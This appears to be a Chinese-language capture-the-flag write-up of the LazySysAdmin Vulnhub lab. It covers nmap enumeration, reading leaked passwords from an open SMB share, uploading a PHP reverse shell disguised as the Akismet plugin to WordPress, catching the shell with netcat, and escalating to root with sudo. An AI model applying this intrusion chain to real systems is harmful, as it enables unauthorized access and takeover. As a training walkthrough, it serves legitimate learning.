Lazysysadmin靶機筆記
概述
lazysysadmin是一臺Vulnhub靶機,整體比較簡單。
靶機地址:https://pan.baidu.com/s/19nBjhMpGkdBDBFSnMEDfOg?pwd=heyj
提取碼:heyj
一、nmap掃描
1、主機發現
# -sn只做ping掃描,不做埠掃描
sudo nmap -sn 192.168.247.1/24
看到靶機IP地址是192.168.247.138
MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.247.138
Host is up (0.00072s latency).
2、埠掃描
-sT 以TCP全連線掃描,--min-rate 10000 以最低10000速率進行掃描,-p-進行全埠掃描,-o ports結果輸出到ports檔案中
sudo nmap -sT --min-rate 10000 -p- 192.168.247.138 -o ports
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-08 10:21 EDT
Nmap scan report for 192.168.247.138
Host is up (0.0023s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc
MAC Address: 00:0C:29:D5:2D:FE (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds
提取埠
cat 檢視檔案 grep過濾open字串 awk 中-F指定分隔符,列印分隔後的第一列,paste -s指定多行拼接,-d指定拼接符
cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','
結果 22,80,139,445,3306,6667
複製給變了ports
ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')
3、詳細資訊掃描
以tcp, 探測版本, 以預設指令碼 掃描埠 $ports,探測作業系統版本,輸出到details檔案中
sudo nmap -sT -sV -sC -p$ports -O 192.168.247.138 -o details
# 在輸入完$ports按tab鍵會自動補全埠
sudo nmap -sT -sV -sC -p22,80,139,445,3306,6667 -O 192.168.247.138 -o details
結果:
# Nmap 7.93 scan initiated Thu Aug 8 10:27:15 2024 as: nmap -sT -sV -sC -p22,80,139,445,3306,6667 -O -o details 192.168.247.138
Nmap scan report for 192.168.247.138
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b538660fa1eecd41693b82cfada1f713 (DSA)
| 2048 585a6369d0dadd51ccc16e00fd7e61d0 (RSA)
| 256 6130f3551a0ddec86a595bc99cb49204 (ECDSA)
|_ 256 1f65c0dd15e6e421f2c19ba3b655a045 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-generator: Silex v2.2.7
|_http-title: Backnode
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.247.128
|_ error: Closing link: (nmap@192.168.247.128) [Client exited]
MAC Address: 00:0C:29:D5:2D:FE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -3h19m58s, deviation: 5h46m24s, median: 1s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2024-08-09T00:27:30+10:00
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-08-08T14:27:30
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 8 10:27:38 2024 -- 1 IP address (1 host up) scanned in 23.27 seconds
看到目標服務開啟ssh,smb,http,mysql,和irc服務的詳細資訊
4、預設指令碼掃描
nmap --script=vuln -p22,80,139,445,3306,6667 192.168.247.138 -o vuln
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /wordpress/: Blog
| /test/: Test page
| /robots.txt: Robots file
| /info.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /wordpress/wp-login.php: Wordpress login page.
| /apache/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_ /old/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
| irc-botnet-channels:
|_ ERROR: TIMEOUT
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
Nmap done: 1 IP address (1 host up) scanned in 320.62 seconds
根據優先順序,我們應該是先對web做滲透測試,然後依次是smb,mysql,ssh等
二、web滲透
nmap預設漏洞指令碼掃描結果出現了幾條路徑,我們訪問一下
192.168.247.138
主頁,這裡翻看了一下,沒有什麼有用的資訊
192.168.247.138/wordpress/
這裡一直在強調My name is togie
togie會不會就是使用者名稱呢,我們先往下看
192.168.247.138/test/
192.168.247.138/apache/
192.168.247.138/old/
192.168.247.138/info.php
192.168.247.138/robots.txt
上面這些都路徑沒有有用的資訊
我們看一下兩個登陸頁面
http://192.168.247.138/phpMyAdmin/
192.168.247.138/wordpress/wp-login.php
嘗試了弱口令,並不能登陸成功
嘗試目錄爆破,看看還有什麼我們遺漏的頁面:gobuster 、ffuf、dirb、dirsearch都可以
有興趣可以熟悉一下命令,這是我們滲透測試應該想到的東西,雖然這次沒有有價值資訊。
目錄爆破出來也是這些頁面,並沒有什麼有價值的資訊
web總結:我們發現了一個可能的使用者名稱togie
三、smb服務滲透
1)ssh憑證
smbclient -L 192.168.247.138
rename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
我們不知道密碼,就用空密碼看看能不能訪問共享檔案
我們最感興趣的應該是share$目錄了,進去看看
smbclient //192.168.247.138/share$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \>
進來了,我們翻找一下有用的資訊吧
smb: \> dir
. D 0 Tue Aug 15 07:05:52 2017
.. D 0 Mon Aug 14 08:34:47 2017
wordpress D 0 Fri Aug 9 20:44:17 2024
Backnode_files D 0 Mon Aug 14 08:08:26 2017
wp D 0 Tue Aug 15 06:51:23 2017
deets.txt N 139 Mon Aug 14 08:20:05 2017
robots.txt N 92 Mon Aug 14 08:36:14 2017
todolist.txt N 79 Mon Aug 14 08:39:56 2017
apache D 0 Mon Aug 14 08:35:19 2017
index.html N 36072 Sun Aug 6 01:02:15 2017
info.php N 20 Tue Aug 15 06:55:19 2017
test D 0 Mon Aug 14 08:35:10 2017
old D 0 Mon Aug 14 08:35:13 2017
3029776 blocks of size 1024. 1313772 blocks available
mget下來
smb: \> mget *.*
Get file deets.txt? y
getting file \deets.txt of size 139 as deets.txt (33.9 KiloBytes/sec) (average 33.9 KiloBytes/sec)
Get file robots.txt? y
getting file \robots.txt of size 92 as robots.txt (29.9 KiloBytes/sec) (average 32.2 KiloBytes/sec)
Get file todolist.txt? y
getting file \todolist.txt of size 79 as todolist.txt (25.7 KiloBytes/sec) (average 30.3 KiloBytes/sec)
Get file index.html? y
getting file \index.html of size 36072 as index.html (7045.2 KiloBytes/sec) (average 2368.6 KiloBytes/sec)
Get file info.php? y
getting file \info.php of size 20 as info.php (9.8 KiloBytes/sec) (average 2091.1 KiloBytes/sec)
檢視一下這裡只有deets有一些我們用的到的資訊
cat deets.txt
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
給了我們一個password 12345
這會不會是togie的密碼呢
2)wordpress憑證
我們接著看smb的/wordpress目錄
smb: \wordpress\> ls
. D 0 Fri Aug 9 20:44:17 2024
.. D 0 Tue Aug 15 07:05:52 2017
wp-config-sample.php N 2853 Wed Dec 16 04:58:26 2015
wp-trackback.php N 4582 Fri Aug 9 10:33:20 2024
wp-admin D 0 Wed Aug 2 17:02:02 2017
wp-settings.php N 16200 Thu Apr 6 14:01:42 2017
wp-blog-header.php N 364 Sat Dec 19 06:20:28 2015
index.php N 418 Tue Sep 24 20:18:11 2013
wp-cron.php N 3286 Sun May 24 13:26:25 2015
wp-links-opml.php N 2422 Sun Nov 20 21:46:30 2016
readme.html N 7413 Fri Aug 9 10:33:21 2024
wp-signup.php N 29924 Tue Jan 24 06:08:42 2017
wp-content D 0 Fri Aug 9 10:56:13 2024
license.txt N 19935 Fri Aug 9 10:33:21 2024
wp-mail.php N 8002 Fri Aug 9 10:33:21 2024
wp-activate.php N 6864 Fri Aug 9 10:33:21 2024
.htaccess H 35 Tue Aug 15 07:40:13 2017
xmlrpc.php N 3065 Wed Aug 31 12:31:29 2016
wp-login.php N 34347 Fri Aug 9 10:33:21 2024
wp-load.php N 3301 Mon Oct 24 23:15:30 2016
wp-comments-post.php N 1627 Mon Aug 29 08:00:32 2016
wp-config.php N 3703 Mon Aug 21 05:25:14 2017
wp-includes D 0 Wed Aug 2 17:02:03 2017
3029776 blocks of size 1024. 1313868 blocks available
我們看到了wp-config.php、license.txt下載下來檢視一下
看到了一組wordpress憑證,我們寫進``creds`檔案裡
四、獲得立足點
兩組憑據
方式1:ssh憑據
ssh togie@192.168.247.138
方式二:wordpress
登陸進後臺首先想到上傳外掛的方式去反彈shell
這裡網上隨便找一個php反彈shell的指令碼,我找的是pentestmonkey的
隨便找一個plugin的頭部,新增到我們的反彈指令碼里
/**
* @package Akismet
*/
/*
Plugin Name: Akismet Anti-Spam
Plugin URI: https://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 3.3.3
Author: Automattic
Author URI: https://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/
讓後打包成zip檔案,因為上傳只能是zip
zip rev.zip php-reverse-shell.php
adding: php-reverse-shell.php (deflated 58%)
上傳安裝
成功
本地監聽
nc -lvp 4444
訪問
192.168.247.138/wordpress/wp-content/plugins/rev/php-reverse-shell.php
收到反彈shell
python -c "import pty;pty.spawn('/bin/bash')"
ww-data@LazySysAdmin:/$ uname -a
uname -a
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
export TERM=xterm-color # 可以用clear清屏
翻找flag,有一個togie使用者但目錄下是空的。我們切換到它
www-data@LazySysAdmin:/home/togie$ su togie
su togie
Password: 12345
togie@LazySysAdmin:~$
五、提權到root
sudo -l #檢視一下
togie的sudo(ALL:ALL)ALL的
直接sudo/bin/bash提權
拿到flag
root@LazySysAdmin:/root# cat proof.txt
cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
總結
- 我們顯示用nmap掃描發現目標開放了22,80,139,445等埠的服務,根據優先順序,優先選擇web的埠
- 透過漏洞指令碼的掃描我們發現了一些web的路徑,透過一個一個的訪問,我們發現了一個可能的使用者名稱togie,以及wordpress和phpmyadmin的登陸框
- 我們利用smb服務發現了togie使用者的密碼,以及wp的使用者名稱和密碼。
- 透過ssh或者wp的反彈shell,成功獲得立足點
- 利用sudo /bin/bash 命令進行提權到root,拿到flag
proof.txt檔案